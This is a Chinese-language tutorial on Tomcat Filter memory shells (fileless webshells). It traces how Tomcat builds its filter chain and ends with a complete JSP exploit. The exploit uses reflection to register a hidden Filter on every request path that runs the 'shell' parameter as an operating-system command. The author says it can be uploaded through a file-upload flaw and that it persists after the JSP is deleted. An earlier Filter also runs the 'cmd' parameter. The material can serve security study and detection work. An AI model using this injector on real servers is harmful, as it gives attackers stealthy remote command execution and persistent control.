知識(shí)基礎(chǔ):
剛開(kāi)始內(nèi)存馬的這塊學(xué)習(xí)與反序列化并無(wú)太大關(guān)系,反而與javaweb,tomcat聯(lián)系更加緊密。所以在學(xué)習(xí)內(nèi)存馬之前需要先了解JSP,java web的三大件,Servlet,F(xiàn)ilter,Listener的基本知識(shí)和工作流程和Tomcat 架構(gòu)的相關(guān)內(nèi)容。
0x01 什么是Filter馬
內(nèi)存馬就是無(wú)文件木馬,無(wú)文件落地,它通常會(huì)存在進(jìn)程,內(nèi)存或者java虛擬機(jī)中,特點(diǎn)更加隱蔽,難以排查,并且也難以刪除。而今天學(xué)習(xí)的Filter內(nèi)存馬是傳統(tǒng)web應(yīng)用型內(nèi)存馬,主要將惡意代碼注入到過(guò)濾器中,當(dāng)過(guò)濾器攔截servlet請(qǐng)求的參數(shù)時(shí),過(guò)濾器中的惡意代碼就會(huì)執(zhí)行。
0x02 環(huán)境搭建
首先配置一個(gè) servlet 的web項(xiàng)目,
1.png
然后一直點(diǎn)下一步就好了,它會(huì)自動(dòng)幫我們生成一個(gè)簡(jiǎn)單的servlet。
pom.xml中導(dǎo)入tomcat相關(guān)依賴:
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-catalina</artifactId>
<version>9.0.38</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-websocket</artifactId>
<version>9.0.38</version>
</dependency>
|
方便之后調(diào)試代碼,在這之后我們創(chuàng)建一個(gè)自定義的Filter過(guò)濾器
package com.example.memoryhorse;
import javax.servlet.*;
import java.io.IOException;
public class MyFilter implements Filter{
@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
System.out.println("執(zhí)行過(guò)濾功能");
servletRequest.setCharacterEncoding("utf-8");
servletResponse.setCharacterEncoding("utf-8");
servletResponse.setContentType("text/html;charset=UTF-8");
filterChain.doFilter(servletRequest,servletResponse);
System.out.println(servletRequest.getParameter("cmd"));
Runtime.getRuntime().exec(servletRequest.getParameter("cmd"));
}
}
|
重寫了doFilter方法,里面添加惡意代碼,接收cmd參數(shù),執(zhí)行任意命令。web.xml中配置相關(guān)參數(shù)
<filter>
<filter-name>MyFilter</filter-name>
<filter-class>com.example.memoryhorse.MyFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>MyFilter</filter-name>
<url-pattern>/MyFilter</url-pattern>
</filter-mapping>
|
這里我定義的是/MyFilter路由,在訪問(wèn)這個(gè)路由時(shí),就會(huì)被我們自定義的過(guò)濾器攔截。
0x03 Filter內(nèi)存馬探索
這個(gè)時(shí)候是不是就有點(diǎn)像內(nèi)存馬的樣子,我們注冊(cè)了一個(gè)惡意的 /MyFilter 路由,訪問(wèn)這個(gè)路由可以執(zhí)行任意代碼。測(cè)試一下。
2.png
成功彈出計(jì)算器,這也是注入Filter內(nèi)存馬的一個(gè)抽象的體現(xiàn)。然而在實(shí)際攻防場(chǎng)景中,我們不可能在別人服務(wù)器上插入自己自定義的過(guò)濾器,web.xml這個(gè)配置文件也不是那么容易修改,就算修改了配置文件也很好排查,起不到隱秘的效果,要想動(dòng)態(tài)的注冊(cè)Filter馬,就必須弄清楚過(guò)濾器的創(chuàng)建和調(diào)用過(guò)程。
1.tomcat Filter 的流程分析
在MyFilter的doFilter方法里下個(gè)斷點(diǎn),訪問(wèn)/MyFilter路由,會(huì)被我們自定義的過(guò)濾器攔截,doFilter方法是處理過(guò)濾功能的方法,開(kāi)始調(diào)試。
3.png
這個(gè)filterChain是一個(gè)過(guò)濾器鏈,通過(guò)調(diào)試看到里面存放著兩個(gè)過(guò)濾器,一個(gè)是我們自定義的,一個(gè)是 tomcat 自帶的,跟進(jìn)它的doFilter方法。
判斷 Globals.IS_SECURITY_ENABLED 安全模式是否開(kāi)啟,這里判斷false。
4.png
跟進(jìn) internalDoFilter 方法。
5.png
filters 是過(guò)濾器鏈數(shù)組,取數(shù)組的下標(biāo),遍歷過(guò)濾器,賦值給filterConfig。
6.png
此時(shí)的過(guò)濾器為WsFilter 調(diào)用它的doFilter方法,跟進(jìn)看一下。
7.png
這里的判斷 是否滿足WebSocket握手的特殊條件,而且是否已經(jīng)配置了相應(yīng)的類來(lái)處理WebSocket連接,如果兩個(gè)都不滿足,然后回調(diào)用過(guò)濾器鏈中的下一個(gè)過(guò)濾器。繼續(xù)跟進(jìn)。
又回到了 internalDoFilter 方法,此時(shí)pos=2,不滿足if條件。也就是說(shuō)當(dāng)過(guò)濾器遍歷完后,就會(huì)調(diào)用 service 方法處理具體的業(yè)務(wù)請(qǐng)求。
8.png
事實(shí)上可以定義多個(gè)過(guò)濾器,當(dāng)攔截請(qǐng)求后,從filterChain 中一個(gè)個(gè)調(diào)用doFilter方法,最終執(zhí)行 service 方法。
那么Filter鏈?zhǔn)窃趺匆徊讲絼?chuàng)建的,我們要注冊(cè)一個(gè)惡意的Filter進(jìn)去就需要了解Filter鏈的創(chuàng)建過(guò)程。
9.png
通過(guò)執(zhí)行流可以看到不斷調(diào)用 invoke 方法,跟進(jìn)最后一個(gè) invoke方法,也就是 StandardWrapperValve 類的 invoke 方法。
10.png
這里已經(jīng)創(chuàng)建好了 Filter鏈,往上翻代碼。
11.png
createFilterChain 就是創(chuàng)建Filter鏈的重要方法,進(jìn)入到這個(gè)方法下個(gè)斷點(diǎn),開(kāi)始調(diào)試。
12.png
這里實(shí)例化一個(gè)filterChain,設(shè)置了當(dāng)前過(guò)濾器鏈中的 Servlet,然后獲取當(dāng)前 Servlet 包含在的上下文,從調(diào)式信息就可以看到是 StandardContext 對(duì)象,最后定義一個(gè)filterMaps 獲取了當(dāng)前上下文中的過(guò)濾器映射。
13.png
此時(shí)的filterMaps就獲取到了兩個(gè)過(guò)濾器,到后面會(huì)對(duì)filterMaps進(jìn)行兩次遍歷。
這段代碼的目的是將根據(jù) URL 和 Servlet 名稱匹配的過(guò)濾器配置添加到過(guò)濾器鏈中,以確保在請(qǐng)求處理過(guò)程中應(yīng)用適當(dāng)?shù)倪^(guò)濾器。匹配過(guò)濾器配置時(shí),會(huì)檢查 Dispatcher 類型、URL 和 Servlet 名稱,然后將匹配的過(guò)濾器配置添加到過(guò)濾器鏈中。如果沒(méi)有匹配的過(guò)濾器配置,繼續(xù)處理下一個(gè)過(guò)濾器映射。
14.png
filterConfig 是通過(guò)調(diào)用context上下文的findFilterConfig方法獲取,filterConfigs是一個(gè)Map,從里面拿。
15.png
最后通過(guò) addFilter 方法將過(guò)濾器添加到鏈中。
2.攻擊思路分析
過(guò)濾器是從filterConfigs這個(gè)Map里拿的,那么我們把惡意的Filter添加進(jìn) filterConfigs 里,等它取出來(lái),添加到Filter鏈中就可以了,那么接下來(lái)怎么構(gòu)造過(guò)濾器,也就是filterConfig,看調(diào)試信息。
16.png
首先獲取上下文context,然后就是自定義的filter代碼,最后一個(gè)filterDef就是對(duì)應(yīng)web.xml中對(duì)filter的配置,fiterConfig的相關(guān)內(nèi)容都是從context中得到。
FilterDefs:存放 FilterDef 的數(shù)組 ,F(xiàn)ilterDef 中存儲(chǔ)著我們過(guò)濾器名,過(guò)濾器實(shí)例
等基本信息
FilterConfigs:存放 filterConfig 的數(shù)組,在 FilterConfig 中主要存放 FilterDef 和
Filter 對(duì)象等信息
FilterMaps:存放 FilterMap 的數(shù)組,在 FilterMap 中主要存放了 FilterName 和 對(duì)
應(yīng)的 URLPattern
|
所以只要我們將filter ,F(xiàn)ilterDefs,F(xiàn)ilterMaps添加到FilterConfigs中就可以添加filter了。
貼上別的師傅的流程圖:
17.png
其中這里涉及到了幾個(gè)類:
ServletContext:
javax.servlet.ServletContextServlet規(guī)范中規(guī)定了的一個(gè)ServletContext接口,提供了Web應(yīng)用所有Servlet的視圖,通過(guò)它可以對(duì)某個(gè)Web應(yīng)用的各種資源和功能進(jìn)行訪問(wèn)。WEB容器在啟動(dòng)時(shí),它會(huì)為每個(gè)Web應(yīng)用程序都創(chuàng)建一個(gè)對(duì)應(yīng)的ServletContext,它代表當(dāng)前Web應(yīng)用。并且它被所有客戶端共享。
ApplicationContext:
org.apache.catalina.core.ApplicationContext
對(duì)應(yīng)Tomcat容器,為了滿足Servlet規(guī)范,必須包含一個(gè)ServletContext接口的實(shí)現(xiàn)。Tomcat的Context容器中都會(huì)包含一個(gè)ApplicationContext。
StandardContext:
Catalina主要包括Connector和Container,StandardContext就是一個(gè)Container,它主要負(fù)責(zé)對(duì)進(jìn)入的用戶請(qǐng)求進(jìn)行處理。實(shí)際來(lái)說(shuō),不是由它來(lái)進(jìn)行處理,而是交給內(nèi)部的valve處理。
一個(gè)context表示了一個(gè)外部應(yīng)用,它包含多個(gè)wrapper,每個(gè)wrapper表示一個(gè)servlet定義。(Tomcat 默認(rèn)的 Service 服務(wù)是 Catalina)
|
引用師傅的解釋,當(dāng)前這是前面tomcat架構(gòu)的內(nèi)容,所以基礎(chǔ)內(nèi)容還是要了解。
0x04 Filter內(nèi)存馬exp編寫
通過(guò)反射創(chuàng)建上面需要的幾個(gè)對(duì)象:
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.catalina.core.ApplicationContextFacade" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.HashMap" %>
<%@ page import="java.io.IOException" %>
<%
//請(qǐng)求對(duì)象 request 中獲取 ServletContext 對(duì)象。
ServletContext servletContext = request.getServletContext();
//ApplicationContextFacade 是 Spring 框架中的一個(gè)類,用于封裝 Spring 的 Web 應(yīng)用程序上下文。
ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletContext;
//通過(guò)反射獲取上下文
Field applicationContextFacadeContext = applicationContextFacade.getClass().getDeclaredField("context");
applicationContextFacadeContext.setAccessible(true);
// context 字段,即 Spring 的應(yīng)用程序上下文對(duì)象。通過(guò)反射獲取到該字段的值,它被強(qiáng)制轉(zhuǎn)換為 ApplicationContext 類型
ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeContext.get(applicationContextFacade);
//從 ApplicationContext 類中獲取一個(gè)名為 "context" 的私有字段。這個(gè)字段存儲(chǔ)了實(shí)際的 Spring 應(yīng)用程序上下文對(duì)象
Field applicationContextContext = applicationContext.getClass().getDeclaredField("context");
applicationContextContext.setAccessible(true);
//類型轉(zhuǎn)換standardContext,標(biāo)準(zhǔn)的web應(yīng)用程序上下文
StandardContext standardContext = (StandardContext) applicationContextContext.get(applicationContext);
//創(chuàng)建filterConfigs
Field filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs");
filterConfigs.setAccessible(true);
HashMap hashMap = (HashMap) filterConfigs.get(standardContext);
String filterName = "Filter";
if (hashMap.get(filterName)==null){
//構(gòu)造filter對(duì)象
Filter filter = new Filter() {
@Override
public void init(FilterConfig filterConfig) throws ServletException {
System.out.println("filter初始化");
}
@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
servletRequest.setCharacterEncoding("utf-8");
servletResponse.setCharacterEncoding("utf-8");
servletResponse.setContentType("text/html;charset=UTF-8");
filterChain.doFilter(servletRequest,servletResponse);
System.out.println(servletRequest.getParameter("shell"));
Runtime.getRuntime().exec(servletRequest.getParameter("shell"));
System.out.println("執(zhí)行過(guò)濾");
}
@Override
public void destroy() {
}
};
//構(gòu)造filterDef對(duì)象
FilterDef filterDef = new FilterDef();
filterDef.setFilter(filter);
filterDef.setFilterName(filterName);
filterDef.setFilterClass(filter.getClass().getName());
//將過(guò)濾器的配置信息添加到應(yīng)用程序上下文中
standardContext.addFilterDef(filterDef);
//構(gòu)造filterMap對(duì)象
FilterMap filterMap = new FilterMap();
//添加映射的路由為所有請(qǐng)求
filterMap.addURLPattern("/*");
filterMap.setFilterName(filterName);
filterMap.setDispatcher(DispatcherType.REQUEST.name());
//將上述設(shè)置好的過(guò)濾器映射對(duì)象添加到 StandardContext 中,并將其插入到已有的過(guò)濾器映射之前
standardContext.addFilterMapBefore(filterMap);
//構(gòu)造filterConfig
Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
constructor.setAccessible(true);
ApplicationFilterConfig applicationFilterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
//將filterConfig添加到filterConfigs中,即可完成注入
hashMap.put(filterName,applicationFilterConfig);
response.getWriter().println("注入完成");
}
%>
|
為什么要寫jsp文件,因?yàn)樵趯?shí)際場(chǎng)景中,可以通過(guò)文件上傳漏洞將這個(gè)jsp馬上傳上去完成內(nèi)存馬的注入。注釋上寫了,分步編寫exp。
18.png
注入成功后,我們對(duì)服務(wù)器訪問(wèn)任何請(qǐng)求,都會(huì)執(zhí)行惡意代碼。而且當(dāng)jsp文件刪除后,木馬仍然有效。它存在當(dāng)前的web應(yīng)用上下文中,所以重啟服務(wù)器就沒(méi)了。
參考鏈接:
https://xz.aliyun.com/t/10888
本文作者:XiLitter, 轉(zhuǎn)載請(qǐng)注明來(lái)自FreeBuf.COM
